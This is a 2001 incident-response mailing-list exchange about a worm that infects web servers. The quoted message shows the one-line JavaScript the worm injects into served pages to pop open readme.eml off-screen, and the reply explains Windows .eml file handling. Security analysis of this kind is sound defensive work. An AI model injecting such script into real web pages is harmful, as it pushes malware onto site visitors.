Re: [unisog] Some more details on the worm

From: Jeffrey Altman (jaltman@columbia.edu)
Date: 09/19/01


Date: Tue, 18 Sep 2001 20:54:51 EDT
From: Jeffrey Altman <jaltman@columbia.edu>
To: "Davis, Matt" <matt.davis@countryfinancial.com>
Subject: Re: [unisog] Some more details on the worm
Message-ID: <CMM.0.90.4.1000860891.jaltman@watsun.cc.columbia.edu>


.eml is listed in the Registry as "Microsoft Internet Mail Message"
with Content Type = "message/rfc822". On my Windows 2000 system this
will result in a program called

  \WINDOWS\system32\thumbvw.exe

being executed using the Apartment threading model.

- Jeff

> When pages are served up by an infected server, it looks as though
> readme.eml is 'attached' to them. The server attempts to get the client to
> open them through the following bit of code (from the .dll file):
>
> <script language="JavaScript">window.open("readme.eml", null,
> "resizable=no,top=6000,left=6000")</script>
>
> According to Slashdot, this causes the file to be automatically opened and
> executed by the client. I haven't been able to confirm or deny that (but if
> someone can, please do).
>
> Regards,
> Matt
>
>
> --
> Matt Davis, MCP
> Intermediate Client Server Business Support Analyst
> COUNTRY(SM) Insurance & Financial Services
> 309-821-6288
> mailto:matt.davis@countryfinancial.com
>

 Jeffrey Altman * Sr.Software Designer C-Kermit 8.0 Beta available
 The Kermit Project @ Columbia University includes Secure Telnet and FTP
 http://www.kermit-project.org/ using Kerberos, SRP, and
 kermit-support@kermit-project.org OpenSSL. SSH soon to follow.

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com



Relevant Pages

  • Some more details on the worm
    ... When pages are served up by an infected server, ... The server attempts to get the client to ... open them through the following bit of code (from the .dll file): ... This list is provided by the SecurityFocus ARIS analyzer service. ...
    (Incidents)
  • Re: VB6 DLL versus VB.NET DLL
    ... side-by-side installation of many different versions of a program. ... > In VB 6 I could create a dll file, place it on a server and register the ... > dll file on each client computer, so all client computers know that the ... > in the directory where the executable file is located. ...
    (microsoft.public.dotnet.framework.windowsforms)
  • RE: Strong naming and auto deployment
    ... "but I know that the version number does not matter, the time stamp on the dll file is used when comparing ... the client and server pieces. ...
    (microsoft.public.dotnet.framework.windowsforms)
  • DLL in VB6 versus DLL in VB.NET
    ... In VB 6 I could create a dll file, place it on a server and register the ... dll file on each client computer, so all client computers know that the ... in the directory where the executable file is located. ...
    (microsoft.public.dotnet.framework.performance)
  • VB6 DLL versus VB.NET DLL
    ... In VB 6 I could create a dll file, place it on a server and register the ... dll file on each client computer, so all client computers know that the ... in the directory where the executable file is located. ...
    (microsoft.public.dotnet.framework.windowsforms)